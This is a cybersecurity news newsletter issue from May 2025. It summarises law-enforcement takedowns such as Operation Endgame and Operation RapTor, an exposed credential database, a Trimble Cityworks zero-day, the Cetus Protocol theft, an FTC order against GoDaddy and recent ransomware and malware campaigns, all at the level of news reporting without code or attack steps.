Cybersecurity

Operation Endgame deals a direct blow to the ransomware kill chain

Operation RapTor arrests 270 dark web vendors, 184m records exposed in an unsecured Elastic database, Local US governments breached via exploited Trimble Cityworks zero-day, Cetus Protocol exploited for $223m, FTC settles GoDaddy security failure charges, 3AM ransomware is on the rise, much more

Cynthia B Brumfield

23 May 2025 — 11 min read

Important publishing notice: Metacurity will not publish on Monday, May 26, in honor of the US Memorial Day holiday. We resume publication on May 27. We salute the memory of all those who made the ultimate sacrifice in their duty to defend.

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

Upgrade my subscription

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

Donate what you can!

Cybercriminals around the world suffered a significant disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust in a joint effort called Operation Endgame, dealt a direct blow to the ransomware kill chain by dismantling key infrastructure behind the malware used to launch ransomware attacks, taking down 300 servers worldwide, neutralizing 650 domains, and issuing international arrest warrants against 20 targets.

Among the malware strains neutralized during the action are Bumblebee, Lactrodectus, Qakbot, Hijackloader, DanaBot, Trickbot, and Warmcookie. EUR 3.5 million (around $4 million) in cryptocurrency was seized during the action week, bringing the total amount seized during the Operation Endgame to more than EUR 21.2 million (around $24 million).

In the US, the Department of Justice announced criminal charges against 16 individuals law enforcement authorities have linked to a malware operation known as DanaBot. According to a complaint, DanaBot infected at least 300,000 machines around the world.

The charges describe the group as “Russia-based” and name two suspects, Aleksandr Stepanov and Artem Aleksandrovich Kalinkin, living in Novosibirsk, Russia. Five other suspects are named in the indictment, while another nine are identified only by pseudonyms. In addition to those charges, the Justice Department says the Defense Criminal Investigative Service (DCIS)—a criminal investigation arm of the Department of Defense—carried out seizures of DanaBot infrastructure worldwide, including in the US.

The US government also indicted Russian national Rustam Rafailevich Gallyamov, the leader of the Qakbot botnet malware operation that compromised over 700,000 computers and enabled ransomware attacks.

According to court documents, Gallyamov started to develop Qakbot (also known as Qbot and Pinkslipbot) in 2008 and deployed it to create a network of thousands of infected computers.

Over time, a team of developers was formed around Qakbot, but the indictment notes that other malware was also created under Gallyamov’s leadership.

For about a decade, Gallyamov used Qakbot as a banking trojan with worm capabilities, malware dropper, or backdoor that could also record keystrokes.

According to the indictment, Qakbot infections led to hundreds of ransomware victims across the globe. The list includes private companies, healthcare providers, and government agencies. (Europol, Andy Greenberg / Wired, and Ionut Ilascu / Bleeping Computer)

Europol announced that as part of Operation RapTor, a new large-scale law enforcement operation to disrupt fentanyl and opioid trafficking, as well as the sales of other illicit goods and services on the dark web, resulted in 270 arrests of dark web vendors and buyers across four continents.

The operation involved government agencies from ten countries including Austria, Brazil, France, Germany, the Netherlands, South Korea, Spain, Switzerland, the UK and the US.

The suspects were identified through coordinated investigations based on intelligence from previous takedowns of several dark web marketplaces, including Nemesis, Tor2Door, Bohemia, and Kingdom Markets.

Many had conducted thousands of sales on illicit marketplaces, using encryption tools and cryptocurrencies to cover their tracks.

Europol supported the takedown action by compiling and analysing intelligence packages based on data from the three seized marketplaces.

These packages were then shared with national authorities in the Joint Cybercrime Action Taskforce framework, hosted at Europol’s headquarters, to enable targeted investigations.

The crackdown also allowed the US Office of Foreign Assets Control (OFAC), part of the US Department of Justice’s (DOJ) Joint Criminal Opioid and Darknet Enforcement (JCODE) team, to sanction Iranian national Behrouz Parsarad.

Parsarad is accused of being behind Nemesis Market. A federal grand jury in Ohio's Northern District handed down an indictment against Parsarad on charges related to narcotics trafficking, stemming from his dark web operations.

The US Justice Department said Operation RapTor officers also seized $184m in cash and cryptocurrencies and “a record amount of illegal drugs, firearms and drug trafficking proceeds." (Kevin Poireault / Infosecurity Magazine)

In early May, longtime data-breach hunter and security researcher Jeremiah Fowler discovered an exposed Elastic database containing 184,162,718 records across more than 47 GB of data.

However, the database didn’t include clues about who owns the data or where it may have been gathered.

The sheer range and massive scope of the login details, which include accounts connected to an extensive array of digital services, indicate that the data is some compilation, possibly kept by researchers investigating a data breach or other cybercriminal activity, or owned directly by attackers and stolen by infostealer malware.

Each record included an ID tag for the type of account, a URL for each website or service, and usernames and plaintext passwords. Fowler notes that the password field was called “Senha,” the Portuguese word for password.

In a sample of 10,000 records analyzed by Fowler, there were 479 Facebook accounts, 475 Google accounts, 240 Instagram accounts, 227 Roblox accounts, 209 Discord accounts, and more than 100 each of Microsoft, Netflix, and PayPal accounts. That sample—just a tiny fraction of the total exposure—also included Amazon, Apple, Nintendo, Snapchat, Spotify, Twitter, WordPress, and Yahoo logins, among many others. A keyword search of the sample by Fowler returned 187 instances of the word “bank” and 57 of “wallet.”

The 10,000 sample records had 220 email addresses with .gov domains. These were linked to at least 29 countries, including the United States, Australia, Canada, China, India, Israel, New Zealand, Saudi Arabia, and the United Kingdom.

While Fowler could not identify who had put the database together or where the login details originally came from, he reported the data exposure to World Host Group, the hosting company it was linked to. Access to the database was quickly shut down. (Matt Burgess and Lily Hay Newman / Wired)

Researchers at Cisco Talos say Chinese-speaking hackers have exploited a now-patched Trimble Cityworks zero-day to breach multiple local governing bodies across the United States.

Trimble Cityworks is a Geographic Information System (GIS)- based asset management and work order management software primarily used by local governments, utilities, and public works organizations. It is designed to help infrastructure agencies and municipalities manage public assets, handle permitting and licensing, and process work orders.

The hacking group (UAT-6382) behind this campaign used a Rust-based malware loader to deploy Cobalt Strike beacons and VSHell malware designed to backdoor compromised systems and provide long-term persistent access, as well as web shells and custom malicious tools written in Chinese.

These attacks started in January 2025, when Cisco Talos observed the first signs of reconnaissance activity within the breached organizations' networks.

The security flaw exploited in these attacks (CVE-2025-0994) is a high-severity deserialization vulnerability that allows authenticated threat actors to execute code remotely on the targets' Microsoft Internet Information Services (IIS) servers.

The US Cybersecurity and Infrastructure Security Agency (CISA) also added CVE-2025-0994 to its catalog of actively exploited vulnerabilities on February 7. The agency ordered federal agencies to patch their systems within three weeks as mandated by the November 2021 Binding Operational Directive (BOD) 22-01.

On February 11, CISA released an advisory warning to organizations in the water and wastewater systems, energy, transportation systems, government services and facilities, and communications sectors to "install the updated version immediately." (Sergiu Gatlan / Bleeping Computer)

Related: Cisco Talos, SC Media, Security Week

Several SUI-based tokens plunged on decentralized exchanges amid a $223 million exploit of Cetus Protocol.

Cetus claims to offer the leading DEX and liquidity infrastructure on Sui. However, its liquidity pools were drained of millions of dollars following the attack, with tokens including LOFI and HIPPO dropping over 50% within an hour, according to DEX Screener, and some tokens collapsing more than 90%.

"There was an incident detected on our protocol, and our smart contract has been paused temporarily for safety," Cetus confirmed. "The team is investigating the incident at the moment. We are grateful for your patience."

Analysts at Lookonchain claimed more than $260 million was drained from the protocol. The attacker converted the stolen funds into USDC, bridging to Ethereum, and exchanging for ETH. They estimate that around $60 million USDC has been cross-chained so far.

Blockchain security firm PeckShield said over $200 million had been stolen, repeating the $60 million bridged USDC figure.

Cetus later confirmed the amount stolen totaled roughly $223 million but claimed $162 million of the compromised funds had been successfully paused after locking its smart contract, matching the approximate $60 million remaining figure that appears to have been bridged off Sui. (James Hunt / The Block)

The US Federal Trade Commission (FTC) has finalized an order requiring web hosting giant GoDaddy to secure its services to settle charges of data security failures that led to several data breaches since 2018.

In January, the agency also alleged that GoDaddy, a major website hosting company with roughly five million customers, misled users about its security practices. The FTC found that GoDaddy was unaware of vulnerabilities in its hosting environment due to a lack of standard security measures.

The FTC's order prohibits the company from misleading customers about its security protections and mandates GoDaddy to establish a robust information security program, secure APIs using HTTPS or other secure transfer protocols, and set up a software and firmware update management program.

The order also requires GoDaddy to hire an independent third-party assessor to conduct biennial reviews of its information security program and report any incident where customer data was exposed, accessed, or stolen within 10 days.

Among other requirements, the hosting company has to add at least one mandatory MFA for all customers, employees, and contractors' staff "to any Hosting Service supporting tool or asset, including connecting to any database" and "at least one method that does not require the customer to provide a telephone number, such as by integrating authentication applications or allowing the use of security key." (Sergiu Gatlan / Bleeping Computer)

Researchers at Sophos report that a 3AM ransomware affiliate is conducting highly targeted attacks using email bombing and spoofed IT support calls to socially engineer employees into giving credentials for remote access to corporate systems.

Sophos reports at least 55 attacks leveraging this technique between November 2024 and January 2025, linked to two distinct threat clusters.

Those attacks followed the BlackBasta playbook, including email bombing, vishing via Microsoft Teams, and Quick Assist abuse. The leak of Black Basta's internal conversations helped other threat actors get up to speed, as it included a template to use during Microsoft Teams phishing attacks impersonating IT help desks.

The 3AM ransomware attack, targeting a Sophos client, occurred in the first quarter of 2025 and used a similar approach but with a twist of real phone phishing instead of Microsoft Teams.

The threat actors spoofed the target's real IT department's phone number to make the call appear legitimate. The call happened during a three-minute email bombing wave that received 24 unsolicited emails.

The attacker convinced the employee to open Microsoft Quick Assist and grant remote access, supposedly responding to malicious activity. (Bill Toulas / Bleeping Computer)

Related: Sophos, Tripwire, Dark Reading, SC Media

OT security vendor Dragos reports that attacks on major organizations such as Unimicron, the South African Weather Service (SAWS), National Presto Industries, and Lee Enterprises signaled a surge in ransomware across critical infrastructure sectors in the first quarter of 2025, a trend that was exacerbated by a growth in the variety and sophistication of the tactics used.

"In Q1 2025, Dragos identified 708 ransomware incidents impacting industrial entities worldwide, representing an increase from approximately 600 incidents documented in Q4 2024," Dragos said. "This rise underscores the escalating frequency and complexity of ransomware operations affecting sectors such as manufacturing, transportation, industrial control systems (ICS) equipment, and engineering." (Alexander Culafi / Dark Reading)

Regional Impact Observations, First Quarter of 2025. Source: Dragos.

White hat hacking and cybercrime investigation firm Moonlock Lab reports that cybercriminal campaigns are using fake Ledger apps to target macOS users and their digital assets by deploying malware that attempts to steal seed phrases that protect access to digital cryptocurrency wallets.

The malicious app impersonates the Ledger app to trick the user into typing their seed phrase on a phishing page.

Moonlock Lab says they have been tracking these attacks since August 2024, when the app clones could only "steal passwords, notes, and wallet details to get a glimpse of the wallet’s assets." This information would not be enough to access the funds, though.

With the recent update focusing on stealing the seed phrase, cybercriminals can empty victims' wallets. (Bill Toulas / Bleeping Computer)

Related: Moonlock Lab, Cointelegraph

Security researchers at DomainTools discovered that a Google Chrome Web Store campaign uses over 100 malicious browser extensions that mimic legitimate tools, such as VPNs, AI assistants, and crypto utilities, to steal browser cookies and secretly execute remote scripts.

The extensions offer some of the promised functionality, but also connect to the threat actor's infrastructure to steal user information or receive commands to execute. The malicious Chrome extensions can also modify network traffic to deliver ads, perform redirections, or proxying.

DomainTools' list of over 100 malicious websites includes multiple fake VPN brands and attempts to impersonate legitimate brands, such as Fortinet, YouTube, DeepSeek AI, and Calendly.

These websites include "Add to Chrome" buttons that link to malicious browser extensions on the Chrome Web Store, thus increasing the sense of legitimacy.

Although Google removed many of the extensions DomainTools identified, some remain on the Chrome Web Store. (Bill Toulas / Bleeping Computer)

Malicious site impersonating Fortinet VPN client Source: DomainTools.

Researchers at Sophos report that the ransomware gang DragonForce is fighting a “turf war” with rival ransomware operators to assert its dominance in the cybercrime marketplace.

The group appears responsible for RansomHub’s infrastructure outage in late March 2025, contributing to a significant fall in ransomware attacks in April.

This may result from an attempted “hostile takeover” of the group by DragonForce.

The researchers observed that DragonForce’s attacks on ransomware-as-a-service (RaaS) rivals began after it rebranded as a ‘cartel’ in March 2025 to expand its reach.

Sophos researchers observed that the cartel announcement in March coincided with defacements of leak sites operated by the BlackLock and Mamona ransomware groups. The defacements show DragonForce’s logo. (James Coker / Infosecurity Magazine)

Related: Sophos

Advertisement for the DragonForce cartel. Source: Sophos.

Best Thing of the Day: Finding Vets Jobs in Cybersecurity

Given how well-suited military personnel are to cybersecurity work, one UK charity organization, TechVets, is finding many jobs for veterans every month in the cyber sector.

Bonus Best Thing of the Day: Building AI Secure at the Outset

CISA, the National Security Agency, the Federal Bureau of Investigation, and international partners released guidance on key risks arising from data security and integrity issues across all phases of the AI lifecycle, from development and testing to deployment and operation.

Worst Thing of the Day: Let's Make Commercial Spying Even More Lucrative

The Office of the Director of National Intelligence is developing a system to centralize and “streamline” the use of commercially available information (CAI) by American spy agencies, such as location data derived from mobile ads.

Bonus Worst Thing of the Day: Get Used to China Spying on Everything

US officials warn that telecoms may never be able to purge Salt Typhoon from their networks fully.

Extra Bonus Worst Thing of the Day: Killing US Cybersecurity Conferences to Make America Great Again

Hackers On Planet Earth (HOPE), the iconic and long-running hacking conference, says far fewer people have bought tickets for the event this year than last due to Trump's mass deportation efforts and aggressive detainment of travelers.